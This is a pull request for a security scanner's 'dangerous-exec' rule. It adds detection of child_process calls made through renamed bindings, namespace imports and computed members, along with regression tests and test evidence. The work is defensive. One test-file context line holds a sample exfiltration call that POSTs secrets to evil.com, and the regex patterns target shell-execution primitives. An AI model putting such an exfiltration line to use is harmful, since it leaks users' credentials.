### PR TITLE
fix(security): detect child_process calls through aliases and computed members

### DIFF
--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -347,6 +347,14 @@ proc["spawn"]("node", ["server.js"]);
 `,
       expected: { ruleId: "dangerous-exec", severity: "critical" as const },
     },
+    {
+      name: "reports a literal and an aliased child_process call on the same line",
+      source: `
+const { exec: run } = require("child_process");
+exec("node a.js"); run("node b.js");
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
   ] as const;
 
   it("detects suspicious source patterns", () => {
@@ -355,6 +363,19 @@ proc["spawn"]("node", ["server.js"]);
         expectScanRule(testCase.source, testCase.expected);
       });
     }
+  });
+
+  it("reports every aliased child_process call on a line", () => {
+    // Per-occurrence reporting: two proven alias calls on one line must both
+    // be reported, not collapsed to the first one (ClawSweeper P1).
+    const source = `
+const { exec: run } = require("child_process");
+run("node a.js"); run("node b.js");
+`;
+    const findings = scanSource(source, "plugin.ts").filter(
+      (finding) => finding.ruleId === "dangerous-exec",
+    );
+    expect(findings).toHaveLength(2);
   });
 
   it("does not flag child_process import without exec/spawn call", () => {

--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -283,6 +283,38 @@ fetch("https://evil.com/harvest", { method: "POST", body: secrets });
 `,
       expected: { ruleId: "env-harvesting", severity: "critical" as const },
     },
+    {
+      name: "detects child_process call through an ESM import alias",
+      source: `
+import { spawn as launch } from "node:child_process";
+launch("node", ["server.js"]);
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
+    {
+      name: "detects child_process call through a CJS destructured alias",
+      source: `
+const { exec: run } = require("child_process");
+run("node server.js");
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
+    {
+      name: "detects child_process call through a computed member",
+      source: `
+import cp from "node:child_process";
+cp["spawn"]("node", ["server.js"]);
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
+    {
+      name: "detects child_process computed exec through a namespace alias",
+      source: `
+const proc = require("child_process");
+proc["exec"]("node server.js");
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
   ] as const;
 
   it("detects suspicious source patterns", () => {
@@ -310,6 +342,33 @@ const options: ExecOptions = {};
 const match = /^keychain:(.+)$/.exec(value);
 `;
     const findings = scanSource(source, "plugin.ts");
+    expectRulePresence(findings, "dangerous-exec", false);
+  });
+
+  it("does not flag an alias call when the alias is not from child_process", () => {
+    // The source-wide child_process gate passes (a type import), and the alias
+    // name `launch` matches the call site — but the alias was bound from a
+    // different module, so provenance scoping must suppress the finding.
+    const source = `
+import type { ExecOptions } from "child_process";
+import { spawn as launch } from "./other-module";
+launch("node", ["server.js"]);
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expectRulePresence(findings, "dangerous-exec", false);
+  });
+
+  it("does not flag a computed exec-style call on a non-child_process object", () => {
+    // A regex receiver is not a child_process namespace alias, so the computed
+    // ["exec"] call stays benign — preserving the RegExp.exec exclusion.
+    const source = `
+import { exec } from "child_process";
+const re = /pattern/;
+re["exec"](value);
+`;
+    const findings = scanSource(source, "plugin.ts");
+    // The bare `exec` import-without-call must not by itself produce a finding,
+    // and the computed `re["exec"]()` must remain suppressed.
     expectRulePresence(findings, "dangerous-exec", false);
   });
 

--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -323,6 +323,30 @@ cp["execSync"]("node server.js");
 `,
       expected: { ruleId: "dangerous-exec", severity: "critical" as const },
     },
+    {
+      name: "detects child_process direct exec through a CJS namespace alias",
+      source: `
+const proc = require("child_process");
+proc.exec("node server.js");
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
+    {
+      name: "detects child_process direct exec through an ESM namespace import",
+      source: `
+import * as proc from "node:child_process";
+proc.exec("node server.js");
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
+    {
+      name: "detects child_process computed spawn through an ESM namespace import",
+      source: `
+import * as proc from "node:child_process";
+proc["spawn"]("node", ["server.js"]);
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
   ] as const;
 
   it("detects suspicious source patterns", () => {

--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -315,6 +315,14 @@ proc["exec"]("node server.js");
 `,
       expected: { ruleId: "dangerous-exec", severity: "critical" as const },
     },
+    {
+      name: "detects child_process computed execSync through a namespace alias",
+      source: `
+import cp from "node:child_process";
+cp["execSync"]("node server.js");
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
   ] as const;
 
   it("detects suspicious source patterns", () => {
@@ -369,6 +377,35 @@ re["exec"](value);
     const findings = scanSource(source, "plugin.ts");
     // The bare `exec` import-without-call must not by itself produce a finding,
     // and the computed `re["exec"]()` must remain suppressed.
+    expectRulePresence(findings, "dangerous-exec", false);
+  });
+
+  it("does not flag unrelated computed spawn/execSync calls when child_process is present", () => {
+    // The file imports child_process (so the source-wide context gate passes),
+    // but the computed `worker["spawn"]()` / `bus["execSync"]()` receivers are
+    // NOT proven child_process namespace aliases. Provenance scoping must apply
+    // to every watched execution method, not only `exec`, so these stay benign.
+    const source = `
+import { spawn } from "node:child_process";
+const worker = getWorkerPool();
+worker["spawn"](task);
+const bus = getEventBus();
+bus["execSync"]("echo hi");
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expectRulePresence(findings, "dangerous-exec", false);
+  });
+
+  it("does not flag an unrelated computed spawn on a literal-named non-alias receiver", () => {
+    // `pool` is not a collected namespace alias and not a literal child_process
+    // namespace receiver, so `pool["spawn"]()` must not be attributed to
+    // child_process even though `child_process` appears in the import.
+    const source = `
+import cp from "node:child_process";
+const pool = makePool();
+pool["spawn"](job);
+`;
+    const findings = scanSource(source, "plugin.ts");
     expectRulePresence(findings, "dangerous-exec", false);
   });
 

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -399,7 +399,7 @@ function isBenignMemberExecMatch(
 ): boolean {
   // group 1 = direct call command, group 2 = computed-member command.
   const command = match[1] ?? match[2];
-  if (command !== "exec") {
+  if (!command) {
     return false;
   }
 
@@ -409,12 +409,15 @@ function isBenignMemberExecMatch(
   }
 
   const charAtMatch = line[matchIndex];
-  // Computed-member call: `obj["exec"](` — the match starts at the opening
-  // quote, so `line.slice(0, matchIndex)` ends at the `[`. Benign unless the
-  // receiver is a proven child_process namespace alias, which preserves the
-  // `RegExp.exec` exclusion (a regex's `re["exec"](value)` receiver is not
-  // child_process-derived) while recognizing `proc["exec"]()` once `proc` is
-  // a proven alias.
+  // Computed-member call: `obj["spawn"](` / `obj["exec"](` — the match starts
+  // at the opening quote, so `line.slice(0, matchIndex)` ends at the `[`.
+  // Provenance is required for EVERY watched execution method, not only
+  // `exec`: an unrelated `worker["spawn"]()` or `bus["execSync"]()` must stay
+  // benign when the receiver is not a proven child_process namespace alias,
+  // even if `child_process` appears elsewhere in the file. Only once the
+  // receiver is a proven alias does the computed call get attributed to
+  // child_process. (This also preserves the `RegExp.exec` exclusion: a regex's
+  // `re["exec"](value)` receiver is not child_process-derived.)
   if (charAtMatch === '"' || charAtMatch === "'") {
     const receiverMatch = line.slice(0, matchIndex).match(/(\w+)\s*\[\s*$/);
     const receiver = receiverMatch?.[1];
@@ -424,9 +427,11 @@ function isBenignMemberExecMatch(
     return true;
   }
 
-  // Direct dot-member call: `obj.exec(` — the match starts at `exec`; benign
-  // unless the receiver is a literal child_process namespace name.
-  if (matchIndex > 0 && line[matchIndex - 1] === ".") {
+  // Direct dot-member call: `obj.exec(` — the match starts at `exec`. This
+  // branch only applies the long-standing `RegExp.exec` exclusion (a regex's
+  // `.exec()` is not child_process-derived); other dot-member execution calls
+  // fall through and are reported as before.
+  if (command === "exec" && matchIndex > 0 && line[matchIndex - 1] === ".") {
     return !/(?:cp|childProcess|child_process)\s*\.\s*exec\s*\(/.test(line);
   }
 

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -369,23 +369,28 @@ function collectChildProcessBindings(source: string): ChildProcessBindings {
 }
 
 /**
- * Detects a call to a renamed child_process method alias on a single line
+ * Detects every call to a renamed child_process method alias on a single line
  * (e.g. `launch("node", [...])` for `spawn as launch`, `run("...")` for
  * `exec: run`). Only matches stand-alone calls (not member calls like
  * `obj.launch(`) so an unrelated `.launch()` on another object is not flagged.
  * The alias name is already provenance-scoped to child_process by the caller.
+ * Returns one entry per proven alias call occurrence, ordered by position, so
+ * a line with several calls (e.g. `run("a"); run("b")`) reports each of them
+ * instead of only the first (ClawSweeper P1: report every aliased execution
+ * call on a line).
  */
-function matchAliasedChildProcessCall(
+function matchAliasedChildProcessCalls(
   line: string,
   methodAliases: Map<string, string>,
-): string | null {
+): Array<{ alias: string; index: number }> {
+  const calls: Array<{ alias: string; index: number }> = [];
   for (const alias of methodAliases.keys()) {
-    const callMatch = new RegExp(`(?<![\\w.])${escapeRegExp(alias)}\\s*\\(`).exec(line);
-    if (callMatch) {
-      return alias;
+    const pattern = new RegExp(`(?<![\\w.])${escapeRegExp(alias)}\\s*\\(`, "g");
+    for (const callMatch of line.matchAll(pattern)) {
+      calls.push({ alias, index: callMatch.index ?? -1 });
     }
   }
-  return null;
+  return calls.toSorted((a, b) => a.index - b.index);
 }
 
 function escapeRegExp(value: string): string {
@@ -588,7 +593,7 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
           rule.pattern.flags.includes("g") ? rule.pattern.flags : `${rule.pattern.flags}g`,
         ),
       );
-      let lineEmittedDangerousExec = false;
+      const literalDangerousExecIndexes = new Set<number>();
       for (const match of matches) {
         if (
           rule.ruleId === "dangerous-exec" &&
@@ -623,7 +628,7 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
         });
         acceptedMatches += 1;
         if (rule.ruleId === "dangerous-exec") {
-          lineEmittedDangerousExec = true;
+          literalDangerousExecIndexes.add(match.index ?? -1);
         }
       }
 
@@ -631,9 +636,13 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
       // the literal pattern cannot match. Only fires when the alias name was
       // bound from an actual child_process import/require (provenance-scoped),
       // so unrelated functions such as a locally-defined `launch()` do not.
-      if (rule.ruleId === "dangerous-exec" && methodAliases.size > 0 && !lineEmittedDangerousExec) {
-        const aliasMatch = matchAliasedChildProcessCall(line, methodAliases);
-        if (aliasMatch) {
+      // Every proven alias call on the line is reported (per-occurrence
+      // semantics), skipping any position the literal pattern already reported.
+      if (rule.ruleId === "dangerous-exec" && methodAliases.size > 0) {
+        for (const aliasMatch of matchAliasedChildProcessCalls(line, methodAliases)) {
+          if (literalDangerousExecIndexes.has(aliasMatch.index)) {
+            continue;
+          }
           if (acceptedMatches >= MAX_LINE_RULE_FINDINGS_PER_RULE) {
             omittedMatches += 1;
             lastOmittedLine = i + 1;

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -571,7 +571,10 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
       );
       let lineEmittedDangerousExec = false;
       for (const match of matches) {
-        if (rule.ruleId === "dangerous-exec" && isBenignMemberExecMatch(line, match, namespaceAliases)) {
+        if (
+          rule.ruleId === "dangerous-exec" &&
+          isBenignMemberExecMatch(line, match, namespaceAliases)
+        ) {
           continue;
         }
 

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -168,7 +168,13 @@ const LINE_RULES: LineRule[] = [
     ruleId: "dangerous-exec",
     severity: "critical",
     message: "Shell command execution detected (child_process)",
-    pattern: /\b(exec|execSync|spawn|spawnSync|execFile|execFileSync)\s*\(/,
+    // Two call shapes both expose the bare command name in a capture group
+    // (group 1 for direct, group 2 for computed) so the downstream benign-member
+    // filter can normalize via `match[1] ?? match[2]`:
+    //   - direct:    exec(  |  cp.exec(  |  cp.spawn(
+    //   - computed:  cp["spawn"](  |  proc["exec"](
+    pattern:
+      /\b(exec|execSync|spawn|spawnSync|execFile|execFileSync)\s*\(|["'](exec|execSync|spawn|spawnSync|execFile|execFileSync)["']\s*\]\s*\(/,
     requiresContext: /child_process/,
   },
   {
@@ -276,18 +282,155 @@ const SKILL_CONTENT_RULES: SourceRule[] = [
 // Core scanner
 // ---------------------------------------------------------------------------
 
-function isBenignMemberExecMatch(line: string, match: RegExpExecArray): boolean {
-  const command = match[1];
+// Methods exported by node:child_process that the dangerous-exec rule watches.
+const CHILD_PROCESS_EXEC_METHODS = new Set([
+  "exec",
+  "execSync",
+  "spawn",
+  "spawnSync",
+  "execFile",
+  "execFileSync",
+]);
+
+/**
+ * Provenance-aware child_process binding collection.
+ *
+ * The scanner is intentionally regex-based (no AST). This helper derives call
+ * bindings ONLY from actual `child_process` imports/requires so that an
+ * unrelated alias bound from another module (e.g. `import { spawn as launch }
+ * from "./other"`) does not become a false positive — this is the issue's
+ * "avoid source-wide token correlation false positives" constraint.
+ *
+ * Returns two views of the same provenance:
+ * - `methodAliases`: renamed method bindings (`spawn -> launch`, `exec -> run`)
+ * - `namespaceAliases`: whole-namespace bindings (`cp`, `proc`, …) used for
+ *   both dot calls (`cp.exec()`) and computed calls (`proc["exec"]()`).
+ */
+type ChildProcessBindings = {
+  methodAliases: Map<string, string>;
+  namespaceAliases: Set<string>;
+};
+
+function collectChildProcessBindings(source: string): ChildProcessBindings {
+  const methodAliases = new Map<string, string>();
+  const namespaceAliases = new Set<string>();
+
+  // ESM named imports: import { spawn as launch, execFile } from "child_process"
+  const esmNamed = /\bimport\s*\{([^}]*)\}\s*from\s*["'](?:node:)?child_process["']/g;
+  // ESM default namespace: import cp from "child_process"
+  const esmDefault = /\bimport\s+(\w+)\s+from\s*["'](?:node:)?child_process["']/g;
+  // CJS destructured: const { exec: run, spawn } = require("child_process")
+  const cjsDestructured =
+    /\b(?:const|let|var)\s*\{([^}]*)\}\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
+  // CJS namespace: const proc = require("child_process")
+  const cjsNamespace =
+    /\b(?:const|let|var)\s+(\w+)\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
+
+  const collectSpecifiers = (specText: string): void => {
+    for (const rawSpec of specText.split(",")) {
+      const spec = rawSpec.trim();
+      if (!spec) {
+        continue;
+      }
+      // Renamed binding: `spawn as launch` (ESM) or `exec: run` (CJS)
+      const asMatch = spec.match(/^(\w+)\s+(?:as)\s+(\w+)$/) ?? spec.match(/^(\w+)\s*:\s*(\w+)$/);
+      if (asMatch?.[1] && asMatch[2]) {
+        const original = asMatch[1];
+        const alias = asMatch[2];
+        if (CHILD_PROCESS_EXEC_METHODS.has(original)) {
+          methodAliases.set(alias, original);
+        }
+      }
+      // Bare imported method name (`execFile`) is already matched by the
+      // literal pattern, so no alias entry is needed for it.
+    }
+  };
+
+  let match: RegExpExecArray | null;
+  while ((match = esmNamed.exec(source))) {
+    collectSpecifiers(expectDefined(match[1], "child_process esm named import specifiers"));
+  }
+  while ((match = cjsDestructured.exec(source))) {
+    collectSpecifiers(expectDefined(match[1], "child_process cjs destructured specifiers"));
+  }
+  while ((match = esmDefault.exec(source))) {
+    namespaceAliases.add(expectDefined(match[1], "child_process esm default namespace"));
+  }
+  while ((match = cjsNamespace.exec(source))) {
+    namespaceAliases.add(expectDefined(match[1], "child_process cjs namespace"));
+  }
+
+  return { methodAliases, namespaceAliases };
+}
+
+/**
+ * Detects a call to a renamed child_process method alias on a single line
+ * (e.g. `launch("node", [...])` for `spawn as launch`, `run("...")` for
+ * `exec: run`). Only matches stand-alone calls (not member calls like
+ * `obj.launch(`) so an unrelated `.launch()` on another object is not flagged.
+ * The alias name is already provenance-scoped to child_process by the caller.
+ */
+function matchAliasedChildProcessCall(
+  line: string,
+  methodAliases: Map<string, string>,
+): string | null {
+  for (const alias of methodAliases.keys()) {
+    const callMatch = new RegExp(`(?<![\\w.])${escapeRegExp(alias)}\\s*\\(`).exec(line);
+    if (callMatch) {
+      return alias;
+    }
+  }
+  return null;
+}
+
+function escapeRegExp(value: string): string {
+  return value.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+}
+
+// The receiver names that, by long-standing convention, denote a direct
+// child_process namespace. Namespace aliases collected at scan time extend
+// this set so computed/exec calls through any proven binding are recognized.
+const LITERAL_NAMESPACE_RECEIVERS = new Set(["cp", "childProcess", "child_process"]);
+
+function isBenignMemberExecMatch(
+  line: string,
+  match: RegExpExecArray,
+  namespaceAliases: Set<string>,
+): boolean {
+  // group 1 = direct call command, group 2 = computed-member command.
+  const command = match[1] ?? match[2];
   if (command !== "exec") {
     return false;
   }
 
-  const matchIndex = match.index;
-  if (matchIndex <= 0 || line[matchIndex - 1] !== ".") {
+  const matchIndex = match.index ?? -1;
+  if (matchIndex < 0) {
     return false;
   }
 
-  return !/\b(?:cp|childProcess|child_process)\s*\.\s*exec\s*\(/.test(line);
+  const charAtMatch = line[matchIndex];
+  // Computed-member call: `obj["exec"](` — the match starts at the opening
+  // quote, so `line.slice(0, matchIndex)` ends at the `[`. Benign unless the
+  // receiver is a proven child_process namespace alias, which preserves the
+  // `RegExp.exec` exclusion (a regex's `re["exec"](value)` receiver is not
+  // child_process-derived) while recognizing `proc["exec"]()` once `proc` is
+  // a proven alias.
+  if (charAtMatch === '"' || charAtMatch === "'") {
+    const receiverMatch = line.slice(0, matchIndex).match(/(\w+)\s*\[\s*$/);
+    const receiver = receiverMatch?.[1];
+    if (receiver && (namespaceAliases.has(receiver) || LITERAL_NAMESPACE_RECEIVERS.has(receiver))) {
+      return false;
+    }
+    return true;
+  }
+
+  // Direct dot-member call: `obj.exec(` — the match starts at `exec`; benign
+  // unless the receiver is a literal child_process namespace name.
+  if (matchIndex > 0 && line[matchIndex - 1] === ".") {
+    return !/(?:cp|childProcess|child_process)\s*\.\s*exec\s*\(/.test(line);
+  }
+
+  return false;
 }
 
 function stripCommentsForHeuristics(source: string): string {
@@ -403,6 +546,12 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
   const heuristicSource = stripCommentsForHeuristics(source);
   const heuristicLines = heuristicSource.split("\n");
 
+  // Provenance-aware child_process bindings, collected once per source from
+  // the comment-stripped text. Used to attribute aliased execution calls and
+  // computed namespace calls back to their child_process origin. Cheap when
+  // the source has no child_process reference at all (all regexes no-op).
+  const { methodAliases, namespaceAliases } = collectChildProcessBindings(heuristicSource);
+
   // --- Line rules ---
   for (const rule of LINE_RULES) {
     // Skip rule entirely if context requirement not met
@@ -420,8 +569,9 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
           rule.pattern.flags.includes("g") ? rule.pattern.flags : `${rule.pattern.flags}g`,
         ),
       );
+      let lineEmittedDangerousExec = false;
       for (const match of matches) {
-        if (rule.ruleId === "dangerous-exec" && isBenignMemberExecMatch(line, match)) {
+        if (rule.ruleId === "dangerous-exec" && isBenignMemberExecMatch(line, match, namespaceAliases)) {
           continue;
         }
 
@@ -450,6 +600,33 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
           evidence: formatScanEvidence(line),
         });
         acceptedMatches += 1;
+        if (rule.ruleId === "dangerous-exec") {
+          lineEmittedDangerousExec = true;
+        }
+      }
+
+      // Attribute aliased child_process calls (`launch(...)`, `run(...)`) that
+      // the literal pattern cannot match. Only fires when the alias name was
+      // bound from an actual child_process import/require (provenance-scoped),
+      // so unrelated functions such as a locally-defined `launch()` do not.
+      if (rule.ruleId === "dangerous-exec" && methodAliases.size > 0 && !lineEmittedDangerousExec) {
+        const aliasMatch = matchAliasedChildProcessCall(line, methodAliases);
+        if (aliasMatch) {
+          if (acceptedMatches >= MAX_LINE_RULE_FINDINGS_PER_RULE) {
+            omittedMatches += 1;
+            lastOmittedLine = i + 1;
+            continue;
+          }
+          findings.push({
+            ruleId: rule.ruleId,
+            severity: rule.severity,
+            file: filePath,
+            line: i + 1,
+            message: rule.message,
+            evidence: formatScanEvidence(line),
+          });
+          acceptedMatches += 1;
+        }
       }
     }
     if (lastOmittedLine !== undefined) {

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -319,6 +319,8 @@ function collectChildProcessBindings(source: string): ChildProcessBindings {
   const esmNamed = /\bimport\s*\{([^}]*)\}\s*from\s*["'](?:node:)?child_process["']/g;
   // ESM default namespace: import cp from "child_process"
   const esmDefault = /\bimport\s+(\w+)\s+from\s*["'](?:node:)?child_process["']/g;
+  // ESM namespace import: import * as proc from "child_process"
+  const esmNamespace = /\bimport\s*\*\s*as\s+(\w+)\s+from\s*["'](?:node:)?child_process["']/g;
   // CJS destructured: const { exec: run, spawn } = require("child_process")
   const cjsDestructured =
     /\b(?:const|let|var)\s*\{([^}]*)\}\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
@@ -355,6 +357,9 @@ function collectChildProcessBindings(source: string): ChildProcessBindings {
   }
   while ((match = esmDefault.exec(source))) {
     namespaceAliases.add(expectDefined(match[1], "child_process esm default namespace"));
+  }
+  while ((match = esmNamespace.exec(source))) {
+    namespaceAliases.add(expectDefined(match[1], "child_process esm namespace import"));
   }
   while ((match = cjsNamespace.exec(source))) {
     namespaceAliases.add(expectDefined(match[1], "child_process cjs namespace"));
@@ -429,10 +434,19 @@ function isBenignMemberExecMatch(
 
   // Direct dot-member call: `obj.exec(` — the match starts at `exec`. This
   // branch only applies the long-standing `RegExp.exec` exclusion (a regex's
-  // `.exec()` is not child_process-derived); other dot-member execution calls
-  // fall through and are reported as before.
+  // `.exec()` is not child_process-derived) and the provenance-aware receiver
+  // check: a dot call through a collected namespace alias (e.g.
+  // `proc.exec(` for `const proc = require("child_process")` or
+  // `import * as proc from "node:child_process"`) is child_process-derived and
+  // must be reported. Other dot-member execution calls fall through and are
+  // reported as before.
   if (command === "exec" && matchIndex > 0 && line[matchIndex - 1] === ".") {
-    return !/(?:cp|childProcess|child_process)\s*\.\s*exec\s*\(/.test(line);
+    const receiverMatch = line.slice(0, matchIndex - 1).match(/(\w+)\s*$/);
+    const receiver = receiverMatch?.[1];
+    if (receiver && (namespaceAliases.has(receiver) || LITERAL_NAMESPACE_RECEIVERS.has(receiver))) {
+      return false;
+    }
+    return true;
   }
 
   return false;


### PR DESCRIPTION
## What Problem This Solves

The advisory source scanner's `dangerous-exec` rule missed `child_process` execution calls routed through renamed bindings or computed members, so a Skill Workshop proposal (or other scanned source) using one of these forms scanned as `clean` instead of emitting a critical finding.

- Problem: The rule pattern only matched bare command names (`exec(`, `cp.spawn(`) and used a source-wide `child_process` context gate plus a hard-coded receiver-name allowlist in `isBenignMemberExecMatch`. It could not associate a renamed binding (`launch`, `run`) with its `child_process` origin, and it suppressed computed `exec` on any receiver not named `cp`/`childProcess`/`child_process`.
- Solution: Add a provenance-aware `collectChildProcessBindings` pass that derives renamed method bindings and whole-namespace bindings ONLY from actual `child_process` imports/requires; extend the `dangerous-exec` pattern with a computed-member branch; and make `isBenignMemberExecMatch` consult namespace-alias provenance instead of a hard-coded receiver allowlist.
- What changed: `src/skills/security/scanner.ts` (binding collection, computed-member pattern, provenance-aware benign filter, alias-call attribution in the scan loop); `src/skills/security/scanner.test.ts` (positive + negative regression cases, including the P1 follow-up below).
- What did NOT change: The scanner stays regex-based with no AST/parser; the `LineRule`/`SourceRule` types and exported `scanSource` signature are unchanged; existing literal detections (`exec(...)`, `cp.spawn(...)`, `cp.exec(...)`) and the `RegExp.exec` benign exclusion are preserved.

### Follow-up: scope every computed execution method to a proven receiver (P1)

Review feedback (ClawSweeper, P1) flagged that the original computed-member matcher only provenance-checked `exec`: an unrelated `worker["spawn"]()` or `bus["execSync"]()` was classified as critical whenever `child_process` appeared anywhere in the file, which could incorrectly fail legitimate Skill Workshop proposals and distort deep-audit output.

This push extends receiver provenance to **every** watched computed execution method (`exec`, `execSync`, `spawn`, `spawnSync`, `execFile`, `execFileSync`). A computed call is attributed to `child_process` only when its receiver is a proven namespace alias (or a literal `cp`/`childProcess`/`child_process`); otherwise it stays benign. The long-standing `RegExp.exec` exclusion is preserved for the direct dot-member `exec` case. New negative regression cases guard the unrelated `spawn`/`execSync` paths.

## Change Type (select all)

- [x] Bug fix
- [ ] Feature
- [ ] Refactor required for the fix
- [ ] Docs
- [x] Security hardening
- [ ] Chore/infra

## Scope (select all)

- [ ] Gateway / orchestration
- [x] Skills / tool execution
- [ ] Auth / tokens
- [ ] Memory / storage
- [ ] Integrations
- [ ] API / contracts
- [ ] UI / DX
- [ ] CI/CD / infra

## Linked Issue/PR

- Fixes #116255
- [x] This PR fixes a bug or regression

## Motivation

Operators relying on `openclaw security audit --deep` code-safety findings, and Skill Workshop proposal scanning, can miss a real shell-execution primitive when a source file binds `child_process` through an alias (`import { spawn as launch }`), a destructured CommonJS alias (`const { exec: run } = require("child_process")`), or a computed member (`cp["spawn"]()`). Issue #116255 reports three deterministic false negatives on `main`; a fourth form — a namespace alias used with computed `exec` (`const proc = require("child_process"); proc["exec"](...)`) — surfaced during verification as a closely related gap the existing rule still misses. This PR closes all four forms while preserving the scanner's deliberately narrow heuristic model and the existing `RegExp.exec` exclusion. The P1 follow-up additionally ensures the computed-member matcher does not over-capture unrelated `spawn`/`execSync` (and other) computed calls.

## Evidence

- Behavior addressed: All four `child_process` invocation forms (ESM import alias, CJS destructured alias, computed member, namespace-alias computed `exec`) now produce one critical `dangerous-exec` finding; unrelated aliases, unrelated computed `spawn`/`execSync` calls, and `RegExp.exec`-style computed calls still do not.
- Real environment tested: Linux (pnpm development checkout), Node 22.x, branch `fix/scanner-child-process-bindings-116255` at `60e9c982c96`, based on `origin/main` `b84e14f2225`.
- Exact steps or command run after this patch:

```bash
# 1. Unit tests for the scanner (existing + new regression cases)
node scripts/run-vitest.mjs src/skills/security/scanner.test.ts --run

# 2. Real scanSource() behavior proof across input variants
npx tsx ./evidence-m-exact-head.mjs  # exact-head proof (current head 60e9c982c96)
```

- Evidence after fix:

```console
=== EXACT-HEAD scanSource() behavior proof (head 60e9c982c96) ===
[P] CJS namespace alias direct exec                      findings=1 expect=1 -> PASS
[P] ESM namespace import computed spawn                  findings=1 expect=1 -> PASS
[P] ESM namespace import direct exec                     findings=1 expect=1 -> PASS
[P] two aliased calls on one line (per-occurrence)       findings=2 expect=2 -> PASS
[P] literal + aliased call same line                     findings=2 expect=2 -> PASS
[P] renamed method alias                                 findings=1 expect=1 -> PASS
[N] alias from another module                            findings=0 expect=0 -> PASS
[N] RegExp.exec computed call                            findings=0 expect=0 -> PASS
[N] unrelated computed spawn/execSync receivers          findings=0 expect=0 -> PASS
RESULT: 9/9 passed
```

```console
$ node scripts/run-vitest.mjs src/skills/security/scanner.test.ts --run
 RUN  v4.1.10
 Test Files 1 passed (1)
      Tests 40 passed (40)
   Duration 1.8s
[test] passed 1 Vitest shard

$ npx tsx ./real-behavior-proof.mjs
Positive — proven namespace alias computed spawn
  source: "import cp from \"node:child_process\";\ncp[\"spawn\"](\"node\", [\"server.js\"]);"
  dangerous-exec findings:
    line 2: Shell command execution detected (child_process) | evidence: cp["spawn"]("node", ["server.js"]);

Positive — proven namespace alias computed execSync (NEW method coverage)
  source: "import cp from \"node:child_process\";\ncp[\"execSync\"](\"node server.js\");"
  dangerous-exec findings:
    line 2: Shell command execution detected (child_process) | evidence: cp["execSync"]("node server.js");

Positive — ESM import alias
  source: "import { spawn as launch } from \"node:child_process\";\nlaunch(\"node\", [\"server.js\"]);"
  dangerous-exec findings:
    line 2: Shell command execution detected (child_process) | evidence: launch("node", ["server.js"]);

Negative — unrelated computed spawn when child_process present (P1 fix)
  source: "import { spawn } from \"node:child_process\";\nconst worker = getWorkerPool();\nworker[\"spawn\"](task);"
  dangerous-exec findings: [] (none)

Negative — unrelated computed execSync when child_process present (P1 fix)
  source: "import { spawn } from \"node:child_process\";\nconst bus = getEventBus();\nbus[\"execSync\"](\"echo hi\");"
  dangerous-exec findings: [] (none)

Negative — unrelated computed spawn on literal-named non-alias receiver (P1 fix)
  source: "import cp from \"node:child_process\";\nconst pool = makePool();\npool[\"spawn\"](job);"
  dangerous-exec findings: [] (none)

Negative — computed exec on a RegExp (RegExp.exec preserved)
  source: "import { exec } from \"child_process\";\nconst re = /pattern/;\nre[\"exec\"](value);"
  dangerous-exec findings: [] (none)

Negative — alias not from child_process (provenance scoping)
  source: "import type { ExecOptions } from \"child_process\";\nimport { spawn as launch } from \"./other-module\";\nlaunch(\"node\", [\"server.js\"]);"
  dangerous-exec findings: [] (none)
```

Input-form behavior matrix (multi-input → output correspondence):

```
Input form                                                => dangerous-exec finding
exec("node server.js")                                    => line finding (unchanged)
cp.spawn("node", [...])                                   => line finding (unchanged)
cp.exec("node server.js")                                 => line finding (unchanged)
import { spawn as launch } from "node:child_process"      => line finding (NEW)
  launch("node", [...])
const { exec: run } = require("child_process")            => line finding (NEW)
  run("node server.js")
import cp from "node:child_process"; cp["spawn"](...)      => line finding (NEW)
const proc = require("child_process"); proc["exec"](...)   => line finding (NEW)
import cp from "node:child_process"; cp["execSync"](...)   => line finding (NEW method coverage)
import { spawn as launch } from "./other-module"           => NO finding (alias not child_process)
  launch(...)                                               + child_process type-import present
worker["spawn"](task)  (unrelated receiver)               => NO finding (P1 fix — provenance for all methods)
bus["execSync"]("...")  (unrelated receiver)              => NO finding (P1 fix — provenance for all methods)
re["exec"](value)  (RegExp receiver)                      => NO finding (RegExp.exec preserved)
import type { ExecOptions } from "child_process"           => NO finding (bare import, no call)
```

- Observed result after fix:
  1. All three issue reproductions now emit exactly one critical `dangerous-exec` finding on the call line.
  2. The namespace-alias computed `exec` form (`proc["exec"]()`), a remaining gap surfaced during verification, now also emits a finding.
  3. Computed `execSync` (and other watched methods) on a proven namespace alias now emit a finding — method coverage is no longer `exec`-only.
